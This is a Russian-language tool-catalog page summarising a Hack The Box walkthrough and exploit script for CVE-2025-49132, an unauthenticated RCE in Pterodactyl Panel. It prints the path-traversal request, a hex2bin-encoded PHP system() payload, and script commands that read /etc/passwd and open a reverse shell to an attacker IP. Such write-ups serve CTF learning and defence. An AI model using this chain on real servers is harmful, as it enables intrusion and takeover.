Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-49132_HTB_SEASON10 — Неаутентифицированный эксплойт RCE для CVE-2025-49132 в Pterodactyl Panel через обход пути, внедрение команд PEAR и выполнение PHP-кода. Включает разбор HTB и вспомогательный скрипт. | Kitploit
Инструменты/GitHubGitHub/ahmedf000/cve-2025-49132_htb_season10
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и Образование
GitHubahmedf000/cve-2025-49132_htb_season10

CVE-2025-49132_HTB_SEASON10

Неаутентифицированный эксплойт RCE для CVE-2025-49132 в Pterodactyl Panel через обход пути, внедрение команд PEAR и выполнение PHP-кода. Включает разбор HTB и вспомогательный скрипт.

Репозиторий
26 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-49132 - Эксплойт удаленного выполнения кода в Pterodactyl Panel

HTB Season 10 - Разбор машины Pterodactyl

Обзор

Цель: Pterodactyl HTB Machine (Средняя сложность)
CVE: CVE-2025-49132
Критичность: Критическая (CVSS 9.8)
Тип атаки: Неаутентифицированное удаленное выполнение кода
Затронуто: Pterodactyl Panel < v1.11.11

Эта цепочка эксплойта объединяет:

  1. Обход пути (Path Traversal) в системе локализации
  2. Внедрение команд PEAR через pearcmd.php
  3. Выполнение PHP-кода через запись файла + include

Ошибка

Конечная точка /locales/locale.json панели Pterodactyl позволяет обход пути через параметр locale:

root@kitploit:~
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd

Это можно объединить с pearcmd.php от PEAR для:

  1. Записи произвольных PHP-файлов в /tmp
  2. Их выполнения через другой запрос

Почему это работает

PEAR (PHP Extension and Application Repository) имеет CLI-инструмент (pearcmd.php), который:

  • Принимает команды через параметры URL (предназначен только для CLI)
  • Имеет команду config-create, которая записывает файлы
  • НЕ требует аутентификации при вызове через веб

Цепочка эксплойта:

root@kitploit:~
Обход пути → Загрузка pearcmd.php → Внедрение PHP через config-create → Выполнение вредоносного PHP

Трюк с hex2bin()

Команды кодируются в hex с помощью hex2bin(), чтобы обойти:

  • Проблемы с кодированием URL
  • Фильтры специальных символов
  • Проблемы парсинга Nginx/PHP

Пример:

root@kitploit:~
Команда: whoami
Hex:     77686f616d69
Полезная нагрузка: <?=system(hex2bin('77686f616d69'))?>

Удаленное выполнение кода

Метод: Использование предоставленного exploit.sh

root@kitploit:~
chmod +x exploit.sh

# Получить флаг пользователя
./exploit.sh flag

# Выполнить команды
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"

# Обратная оболочка
nc -lvnp 4444  # На машине атакующего
./exploit.sh shell 10.10.14.21 4444

Ссылки

CVE и эксплойты

  • NVD - CVE-2025-49132
  • OpenCVE - CVE-2025-49132

Технические ресурсы

  • Pterodactyl Panel Docs
  • PEAR Documentation
  • OWASP Path Traversal

Скачать инструмент